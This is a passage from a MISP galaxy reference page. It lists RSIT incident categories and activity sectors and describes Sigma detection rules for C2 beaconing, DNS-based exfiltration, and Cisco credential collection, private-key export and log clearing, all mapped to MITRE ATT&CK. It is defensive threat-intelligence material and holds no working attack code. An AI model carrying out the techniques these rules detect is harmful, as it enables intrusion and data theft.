Malicious Code:C2 Server

Command-and-control server contacted by malware on infected systems.

The tag is: misp-galaxy:rsit="Malicious Code:C2 Server"

Malicious Code:C2 Server has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="likely"

Malicious Code:Malware Distribution

URI used for malware distribution, e.g. a download URL included in fake invoice malware spam or exploit-kits (on websites).

The tag is: misp-galaxy:rsit="Malicious Code:Malware Distribution"

Malicious Code:Malware Configuration

URI hosting a malware configuration file, e.g. web-injects for a banking trojan.

The tag is: misp-galaxy:rsit="Malicious Code:Malware Configuration"

Information Gathering:Scanning

Attacks that send requests to a system to discover weaknesses. This also includes testing processes to gather information on hosts, services and accounts. Examples: fingerd, DNS querying, ICMP, SMTP (EXPN, RCPT, ...), port scanning.

The tag is: misp-galaxy:rsit="Information Gathering:Scanning"

Information Gathering:Scanning has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="likely"

Information Gathering:Sniffing

Observing and recording of network traffic (wiretapping).

The tag is: misp-galaxy:rsit="Information Gathering:Sniffing"

Information Gathering:Sniffing has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="likely"

Information Gathering:Social Engineering

Gathering information from a human being in a non-technical way (e.g. lies, tricks, bribes, or threats).

The tag is: misp-galaxy:rsit="Information Gathering:Social Engineering"

Intrusion Attempts:Exploitation of known Vulnerabilities

An attempt to compromise a system or to disrupt any service by exploiting vulnerabilities with a standardised identifier such as CVE name (e.g. buffer overflow, backdoor, cross site scripting, etc.)

The tag is: misp-galaxy:rsit="Intrusion Attempts:Exploitation of known Vulnerabilities"

Intrusion Attempts:Exploitation of known Vulnerabilities has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:Login attempts

Multiple login attempts (Guessing / cracking of passwords, brute force). This IOC refers to a resource, which has been observed to perform brute-force attacks over a given application protocol.

The tag is: misp-galaxy:rsit="Intrusion Attempts:Login attempts"

Intrusion Attempts:Login attempts has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-language:likelihood-probability="likely"

Intrusion Attempts:New attack signature

An attack using an unknown exploit.

The tag is: misp-galaxy:rsit="Intrusion Attempts:New attack signature"

Intrusions:Privileged Account Compromise

Compromise of a system where the attacker gained administrative privileges.

The tag is: misp-galaxy:rsit="Intrusions:Privileged Account Compromise"

Intrusions:Privileged Account Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Unprivileged Account Compromise

Compromise of a system using an unprivileged (user/service) account.

The tag is: misp-galaxy:rsit="Intrusions:Unprivileged Account Compromise"

Intrusions:Unprivileged Account Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="likely"

Intrusions:Application Compromise

Compromise of an application by exploiting (un-)known software vulnerabilities, e.g. SQL injection.

The tag is: misp-galaxy:rsit="Intrusions:Application Compromise"

Intrusions:Application Compromise has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="likely"

Intrusions:System Compromise

Compromise of a system, e.g. unauthorised logins or commands. This includes compromising attempts on honeypot systems.

The tag is: misp-galaxy:rsit="Intrusions:System Compromise"

Intrusions:Burglary

Physical intrusion, e.g. into corporate building or data-centre.

The tag is: misp-galaxy:rsit="Intrusions:Burglary"

Availability:Denial of Service

Denial of Service attack, e.g. sending specially crafted requests to a web application which causes the application to crash or slow down.

The tag is: misp-galaxy:rsit="Availability:Denial of Service"

Availability:Denial of Service has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Distributed Denial of Service

Distributed Denial of Service attack, e.g. SYN-Flood or UDP-based reflection/amplification attacks.

The tag is: misp-galaxy:rsit="Availability:Distributed Denial of Service"

Availability:Distributed Denial of Service has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Availability:Misconfiguration

Software misconfiguration resulting in service availability issues, e.g. DNS server with outdated DNSSEC Root Zone KSK.

The tag is: misp-galaxy:rsit="Availability:Misconfiguration"

Availability:Sabotage

Physical sabotage, e.g. cutting wires or malicious arson.

The tag is: misp-galaxy:rsit="Availability:Sabotage"

Availability:Outage

Outage caused e.g. by air condition failure or natural disaster.

The tag is: misp-galaxy:rsit="Availability:Outage"

Information Content Security:Unauthorised access to information

Unauthorised access to information, e.g. by abusing stolen login credentials for a system or application, intercepting traffic or gaining access to physical documents.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised access to information"

Information Content Security:Unauthorised modification of information

Unauthorised modification of information, e.g. by an attacker abusing stolen login credentials for a system or application or a ransomware encrypting data. Also includes defacements.

The tag is: misp-galaxy:rsit="Information Content Security:Unauthorised modification of information"

Information Content Security:Unauthorised modification of information has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="likely"

Information Content Security:Data Loss

Loss of data, e.g. caused by harddisk failure or physical theft.

The tag is: misp-galaxy:rsit="Information Content Security:Data Loss"

Information Content Security:Leak of confidential information

Leaked confidential information like credentials or personal data.

The tag is: misp-galaxy:rsit="Information Content Security:Leak of confidential information"

Fraud:Unauthorised use of resources

Using resources for unauthorised purposes including profit-making ventures, e.g. the use of e-mail to participate in illegal profit chain letters or pyramid schemes.

The tag is: misp-galaxy:rsit="Fraud:Unauthorised use of resources"

Fraud:Copyright

Offering or installing copies of unlicensed commercial software or other copyright-protected materials (Warez).

The tag is: misp-galaxy:rsit="Fraud:Copyright"

Fraud:Masquerade

Type of attack in which one entity illegitimately impersonates the identity of another in order to benefit from it.

The tag is: misp-galaxy:rsit="Fraud:Masquerade"

Fraud:Phishing

Masquerading as another entity in order to persuade the user to reveal private credentials. This IOC most often refers to a URL, which is used to phish user credentials.

The tag is: misp-galaxy:rsit="Fraud:Phishing"

Fraud:Phishing has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="likely"

Vulnerable:Weak crypto

Publicly accessible services offering weak crypto, e.g. web servers susceptible to POODLE/FREAK attacks.

The tag is: misp-galaxy:rsit="Vulnerable:Weak crypto"

Vulnerable:DDoS amplifier

Publicly accessible services that can be abused for conducting DDoS reflection/amplification attacks, e.g. DNS open-resolvers or NTP servers with monlist enabled.

The tag is: misp-galaxy:rsit="Vulnerable:DDoS amplifier"

Vulnerable:DDoS amplifier has relationships with:

  • similar: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="likely"

Vulnerable:Potentially unwanted accessible services

Potentially unwanted publicly accessible services, e.g. Telnet, RDP or VNC.

The tag is: misp-galaxy:rsit="Vulnerable:Potentially unwanted accessible services"

Vulnerable:Information disclosure

Publicly accessible services potentially disclosing sensitive information, e.g. SNMP or Redis.

The tag is: misp-galaxy:rsit="Vulnerable:Information disclosure"

Vulnerable:Vulnerable system

A system which is vulnerable to certain attacks. Example: misconfigured client proxy settings (example: WPAD), outdated operating system version, XSS vulnerabilities, etc.

The tag is: misp-galaxy:rsit="Vulnerable:Vulnerable system"

Other:Uncategorised

All incidents which don’t fit into one of the given categories should be put into this class, or the incident has not yet been categorised.

The tag is: misp-galaxy:rsit="Other:Uncategorised"

Other:Undetermined

The categorisation of the incident is unknown/undetermined.

The tag is: misp-galaxy:rsit="Other:Undetermined"

Test:Test

Meant for testing.

The tag is: misp-galaxy:rsit="Test:Test"

Sector

Activity sectors.

Sector is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Unknown

The tag is: misp-galaxy:sector="Unknown"

Other

The tag is: misp-galaxy:sector="Other"

Academia - University

The tag is: misp-galaxy:sector="Academia - University"

Activists

The tag is: misp-galaxy:sector="Activists"

Aerospace

The tag is: misp-galaxy:sector="Aerospace"

Agriculture

The tag is: misp-galaxy:sector="Agriculture"

Arts

The tag is: misp-galaxy:sector="Arts"

Bank

The tag is: misp-galaxy:sector="Bank"

Chemical

The tag is: misp-galaxy:sector="Chemical"

Citizens

The tag is: misp-galaxy:sector="Citizens"

Civil Aviation

The tag is: misp-galaxy:sector="Civil Aviation"

Country

The tag is: misp-galaxy:sector="Country"

Culture

The tag is: misp-galaxy:sector="Culture"

Data Broker

The tag is: misp-galaxy:sector="Data Broker"

Defense

The tag is: misp-galaxy:sector="Defense"

Development

The tag is: misp-galaxy:sector="Development"

Diplomacy

The tag is: misp-galaxy:sector="Diplomacy"

Education

The tag is: misp-galaxy:sector="Education"

Electric

The tag is: misp-galaxy:sector="Electric"

Electronic

The tag is: misp-galaxy:sector="Electronic"

Employment

The tag is: misp-galaxy:sector="Employment"

Energy

The tag is: misp-galaxy:sector="Energy"

Entertainment

The tag is: misp-galaxy:sector="Entertainment"

Environment

The tag is: misp-galaxy:sector="Environment"

Finance

The tag is: misp-galaxy:sector="Finance"

Finance is also known as:

  • Financial

Food

The tag is: misp-galaxy:sector="Food"

Game

The tag is: misp-galaxy:sector="Game"

Gas

The tag is: misp-galaxy:sector="Gas"

Government, Administration

The tag is: misp-galaxy:sector="Government, Administration"

Government, Administration is also known as:

  • Government

  • Administration

Health

The tag is: misp-galaxy:sector="Health"

Health is also known as:

  • Healthcare

Higher education

The tag is: misp-galaxy:sector="Higher education"

Hotels

The tag is: misp-galaxy:sector="Hotels"

Infrastructure

The tag is: misp-galaxy:sector="Infrastructure"

Intelligence

The tag is: misp-galaxy:sector="Intelligence"

IT

The tag is: misp-galaxy:sector="IT"

IT - Hacker

The tag is: misp-galaxy:sector="IT - Hacker"

IT - ISP

The tag is: misp-galaxy:sector="IT - ISP"

IT - Security

The tag is: misp-galaxy:sector="IT - Security"

Justice

The tag is: misp-galaxy:sector="Justice"

Manufacturing

The tag is: misp-galaxy:sector="Manufacturing"

Maritime

The tag is: misp-galaxy:sector="Maritime"

Military

The tag is: misp-galaxy:sector="Military"

Multi-sector

The tag is: misp-galaxy:sector="Multi-sector"

News - Media

The tag is: misp-galaxy:sector="News - Media"

News - Media is also known as:

  • News

  • Media

NGO

The tag is: misp-galaxy:sector="NGO"

Oil

The tag is: misp-galaxy:sector="Oil"

Payment

The tag is: misp-galaxy:sector="Payment"

Pharmacy

The tag is: misp-galaxy:sector="Pharmacy"

Pharmacy is also known as:

  • Pharmaceutical

Police - Law enforcement

The tag is: misp-galaxy:sector="Police - Law enforcement"

Research - Innovation

The tag is: misp-galaxy:sector="Research - Innovation"

Satellite navigation

The tag is: misp-galaxy:sector="Satellite navigation"

Security systems

The tag is: misp-galaxy:sector="Security systems"

Social networks

The tag is: misp-galaxy:sector="Social networks"

Space

The tag is: misp-galaxy:sector="Space"

Steel

The tag is: misp-galaxy:sector="Steel"

Telecoms

The tag is: misp-galaxy:sector="Telecoms"

Telecoms is also known as:

  • Telecommunications

Think Tanks

The tag is: misp-galaxy:sector="Think Tanks"

Trade

The tag is: misp-galaxy:sector="Trade"

Transport

The tag is: misp-galaxy:sector="Transport"

Transport is also known as:

  • Transportation

Travel

The tag is: misp-galaxy:sector="Travel"

Turbine

The tag is: misp-galaxy:sector="Turbine"

Tourism

The tag is: misp-galaxy:sector="Tourism"

Life science

The tag is: misp-galaxy:sector="Life science"

Biomedical

The tag is: misp-galaxy:sector="Biomedical"

High tech

The tag is: misp-galaxy:sector="High tech"

Opposition

The tag is: misp-galaxy:sector="Opposition"

Political party

The tag is: misp-galaxy:sector="Political party"

Hospitality

The tag is: misp-galaxy:sector="Hospitality"

Automotive

The tag is: misp-galaxy:sector="Automotive"

Metal

The tag is: misp-galaxy:sector="Metal"

Railway

The tag is: misp-galaxy:sector="Railway"

Water

The tag is: misp-galaxy:sector="Water"

Smart meter

The tag is: misp-galaxy:sector="Smart meter"

Retail

The tag is: misp-galaxy:sector="Retail"

Technology

The tag is: misp-galaxy:sector="Technology"

Engineering

The tag is: misp-galaxy:sector="Engineering"

Mining

The tag is: misp-galaxy:sector="Mining"

Sport

The tag is: misp-galaxy:sector="Sport"

Restaurant

The tag is: misp-galaxy:sector="Restaurant"

Semi-conductors

The tag is: misp-galaxy:sector="Semi-conductors"

Semi-conductors is also known as:

  • Semiconductor

Insurance

The tag is: misp-galaxy:sector="Insurance"

Legal

The tag is: misp-galaxy:sector="Legal"

Shipping

The tag is: misp-galaxy:sector="Shipping"

Logistic

The tag is: misp-galaxy:sector="Logistic"

Construction

The tag is: misp-galaxy:sector="Construction"

Industrial

The tag is: misp-galaxy:sector="Industrial"

Industrial is also known as:

  • ICS

Communication equipment

The tag is: misp-galaxy:sector="Communication equipment"

Security Service

The tag is: misp-galaxy:sector="Security Service"

Tax firm

The tag is: misp-galaxy:sector="Tax firm"

Television broadcast

The tag is: misp-galaxy:sector="Television broadcast"

Separatists

The tag is: misp-galaxy:sector="Separatists"

Dissidents

The tag is: misp-galaxy:sector="Dissidents"

Digital services

The tag is: misp-galaxy:sector="Digital services"

Digital infrastructure

The tag is: misp-galaxy:sector="Digital infrastructure"

Security actors

The tag is: misp-galaxy:sector="Security actors"

eCommerce

The tag is: misp-galaxy:sector="eCommerce"

Islamic forums

The tag is: misp-galaxy:sector="Islamic forums"

Journalist

The tag is: misp-galaxy:sector="Journalist"

Streaming service

The tag is: misp-galaxy:sector="Streaming service"

Publishing industry

The tag is: misp-galaxy:sector="Publishing industry"

Islamic organisation

The tag is: misp-galaxy:sector="Islamic organisation"

Casino

The tag is: misp-galaxy:sector="Casino"

Consulting

The tag is: misp-galaxy:sector="Consulting"

Online marketplace

The tag is: misp-galaxy:sector="Online marketplace"

DNS service provider

The tag is: misp-galaxy:sector="DNS service provider"

Veterinary

The tag is: misp-galaxy:sector="Veterinary"

Marketing

The tag is: misp-galaxy:sector="Marketing"

Video Sharing

The tag is: misp-galaxy:sector="Video Sharing"

Advertising

The tag is: misp-galaxy:sector="Advertising"

Investment

The tag is: misp-galaxy:sector="Investment"

Accounting

The tag is: misp-galaxy:sector="Accounting"

Programming

The tag is: misp-galaxy:sector="Programming"

Managed Services Provider

The tag is: misp-galaxy:sector="Managed Services Provider"

Lawyers

The tag is: misp-galaxy:sector="Lawyers"

Civil society

The tag is: misp-galaxy:sector="Civil society"

Petrochemical

The tag is: misp-galaxy:sector="Petrochemical"

Immigration

The tag is: misp-galaxy:sector="Immigration"

Non-profit organisation

The tag is: misp-galaxy:sector="Non-profit organisation"

Non-profit organisation is also known as:

  • voluntary

  • charitable

  • non-profit-making

  • not-for-profit

Sigma-Rules

MISP galaxy cluster based on Sigma Rules.

Sigma-Rules is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

@Joseliyo_Jstnk

Juniper BGP Missing MD5

Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.

The tag is: misp-galaxy:sigma-rules="Juniper BGP Missing MD5"

Juniper BGP Missing MD5 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8837. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/juniper/bgp/juniper_bgp_missing_md5.yml

Cleartext Protocol Usage

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that encrypted channels are used for all administrative account access.

The tag is: misp-galaxy:sigma-rules="Cleartext Protocol Usage"

Table 8838. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml

Telegram Bot API Request

Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind

The tag is: misp-galaxy:sigma-rules="Telegram Bot API Request"

Telegram Bot API Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 8839. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://core.telegram.org/bots/faq

https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml

DNS Query to External Service Interaction Domains

Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE

The tag is: misp-galaxy:sigma-rules="DNS Query to External Service Interaction Domains"

DNS Query to External Service Interaction Domains has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"

Table 8840. Table References

Links

https://twitter.com/breakersall/status/1533493587828260866

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml

Cobalt Strike DNS Beaconing

Detects suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Cobalt Strike DNS Beaconing"

Cobalt Strike DNS Beaconing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8841. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml

DNS TXT Answer with Possible Execution Strings

Detects strings used in command execution in DNS TXT Answer

The tag is: misp-galaxy:sigma-rules="DNS TXT Answer with Possible Execution Strings"

DNS TXT Answer with Possible Execution Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8842. Table References

Links

https://twitter.com/stvemillertime/status/1024707932447854592

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml

Suspicious DNS Query with B64 Encoded String

Detects suspicious DNS queries using base64 encoding

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Query with B64 Encoded String"

Suspicious DNS Query with B64 Encoded String has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 8843. Table References

Links

https://github.com/krmaxwell/dns-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml

Wannacry Killswitch Domain

Detects DNS queries for the WannaCry killswitch domain

The tag is: misp-galaxy:sigma-rules="Wannacry Killswitch Domain"

Wannacry Killswitch Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 8844. Table References

Links

https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml

Monero Crypto Coin Mining Pool Lookup

Detects suspicious DNS queries to Monero mining pools

The tag is: misp-galaxy:sigma-rules="Monero Crypto Coin Mining Pool Lookup"

Monero Crypto Coin Mining Pool Lookup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

Table 8845. Table References

Links

https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml

Cisco Discovery

Find information about network devices that is not stored in config files

The tag is: misp-galaxy:sigma-rules="Cisco Discovery"

Cisco Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 8846. Table References

Links

https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml

Cisco Modify Configuration

Modifications to a config that will serve an adversary’s impacts or persistence

The tag is: misp-galaxy:sigma-rules="Cisco Modify Configuration"

Cisco Modify Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 8847. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml

Cisco File Deletion

See what files are being deleted from flash file systems

The tag is: misp-galaxy:sigma-rules="Cisco File Deletion"

Cisco File Deletion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 8848. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml

Cisco Stage Data

Various protocols may be used to put data on the device for exfiltration or infiltration

The tag is: misp-galaxy:sigma-rules="Cisco Stage Data"

Cisco Stage Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 8849. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml

Cisco Show Commands Input

See what commands are being input into the device by other people; full credentials can be in the history

The tag is: misp-galaxy:sigma-rules="Cisco Show Commands Input"

Cisco Show Commands Input has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 8850. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml

Cisco Collect Data

Collect pertinent data from the configuration files

The tag is: misp-galaxy:sigma-rules="Cisco Collect Data"

Cisco Collect Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 8851. Table References

Links

https://blog.router-switch.com/2013/11/show-running-config/

https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml

Cisco Disabling Logging

Turn off logging locally or remotely

The tag is: misp-galaxy:sigma-rules="Cisco Disabling Logging"

Cisco Disabling Logging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 8852. Table References

Links

https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml

Cisco Denial of Service

Detect a system being shutdown or put into different boot mode

The tag is: misp-galaxy:sigma-rules="Cisco Denial of Service"

Cisco Denial of Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 8853. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml

Cisco Sniffing

Show when a monitor or a SPAN/RSPAN session is set up or modified

The tag is: misp-galaxy:sigma-rules="Cisco Sniffing"

Cisco Sniffing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 8854. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml

Cisco Local Accounts

Find local accounts being created or modified as well as remote authentication configurations

The tag is: misp-galaxy:sigma-rules="Cisco Local Accounts"

Cisco Local Accounts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 8855. Table References

Links

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml

Cisco Crypto Commands

Show when private keys are being exported from the device, or when new certificates are installed

The tag is: misp-galaxy:sigma-rules="Cisco Crypto Commands"

Cisco Crypto Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 8856. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml

Cisco Clear Logs

Clear command history in network OS which is used for defense evasion

The tag is: misp-galaxy:sigma-rules="Cisco Clear Logs"

Cisco Clear Logs has relationships with:

